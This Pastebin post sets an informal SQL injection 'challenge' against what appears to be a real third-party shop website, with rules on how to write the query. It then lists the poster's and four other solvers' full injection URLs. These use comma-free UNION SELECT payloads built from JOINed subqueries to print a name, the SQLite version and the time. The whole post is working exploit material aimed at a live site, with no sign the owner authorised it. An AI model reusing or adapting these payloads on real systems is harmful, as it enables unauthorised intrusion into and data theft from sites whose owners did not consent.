Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SQLi-Chall~
- Site: http://asakusa-i.tokyo/e/shops/
- Level: Basic
- Rulez:
- -Find inject point.
- -Print your l33t name, version, and time.
- -Dont use comma (,) in your query.
- -Dont use a,b,c like basic.
- -Dont use query date.
- -Dont use hex, url double encoding, binary, mysqlchar, base64.
- -Dont share your query.
- -PM your query autosolver.
- Thanks, Happy Injecting ^^)
- Solver:
- -@Defri Indra Mahardika
- -@Mayat 2.7.15
- -@-/RaYss\-
- -@Rahman ID
- =CLOSED=
- My query:
- http://asakusa-i.tokyo/e/shops/shop.php?id=23%20union%20select%20*%20from%20(select%201)paw%20JOIN(select%202)paw1%20JOIN(select%203)paw2%20JOIN(select%204)paw3%20JOIN(select%205)paw4%20JOIN(select%206)paw5%20JOIN(select%207)paw6%20JOIN(select%208)paw6%20JOIN(select%209)paw7%20JOIN(select%2010)paw8%20JOIN(select%2011)paw9%20JOIN(select%2012)paw10%20JOIN(select%20group_concat(%27Sebut%20Saja%20Milea%27||%27%3Cbr%3E%27||sqlite_version()||%27%3Cbr%3E%27||datetime()))paw11%20JOIN(select%2014)paw12%20JOIN(select%2015)paw13%20JOIN(select%2016)paw14--%20-
- Defri:
- http://asakusa-i.tokyo/e/shops/shop.php?id=2 union select * from
- (select null) as a1a join
- (select null) as a2a join
- (select null) as a3a join
- (select null) as a4a join
- (select null) as a5a join
- (select null) as a6a join
- (select null) as a7a join
- (select null) as a8a join
- (select null) as a9a join
- (select null) as a10a join
- (select null) as a11a join
- (select null) as a12a join
- (select (select datetime(strftime('now')))) as a12a join
- (select (select sqlite_version())) as a13a join
- (select "Grey X") as a14a join
- (select null) as a15a--
- Mayat:
- http://asakusa-i.tokyo/e/shops/shop.php?id=1 union select * from (select 1) join(select 2) join(select 3) join(select 4) join(select 5) join(select 6) join(select 7) join(select 8) join(select 9) join(select 10) join(select 11) join(select 12) join(select sqlite_version()) join(select strftime('%Y-%m-%d | %H:%M:%S')) join(select 'Mayat 2.7.15') join(select 16)
- -Rays:
- http://asakusa-i.tokyo/e/shops/shop.php?id=3%20%20union%20select%20*%20from%20(select%201)ff%20JOIN%20(select%202)gg%20JOIN%20(select%204)hh%20JOIN%20(select%203)ii%20JOIN%20(select%205)j%20JOIN%20(select%206)kk%20JOIN%20(select%207)ll%20JOIN%20(select%208)mm%20JOIN%20(select%209)n%20JOIN%20(select%2010)oo%20JOIN%20(select%2011)pp%20JOIN%20(select%2012)qq%20JOIN%20(select%20%27RaYss%27)rr%20JOIN%20(select%20sqlite_version())ss%20JOIN%20(select%20datetime())tt%20JOIN%20(select%2016)uu--%20-
- -Rahman haxor:
- http://asakusa-i.tokyo/e/shops/shop.php?id=23%20union%20select%20*%20from%20(select%20null)a%20JOIN(select%20null)b%20JOIN(select%20null)c%20JOIN(select null)d%20JOIN(select%20null)e%20JOIN(select%20null)f%20JOIN(select%20null)g%20JOIN(select%20null)h%20JOIN(select%20null)i%20JOIN(select%20null)j%20JOIN(select%20null)k%20JOIN(select%20null)l%20JOIN(select%20%27Bayu%3Cbr%3E%27||sqlite_version()||%27%3Cbr%3E%27||time())m%20JOIN(select%20null)n%20JOIN(select%20null)o%20JOIN(select%20null)p--%20-
- Thanks yang sudah berpatisipasi dalam chall ini ^^)~
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement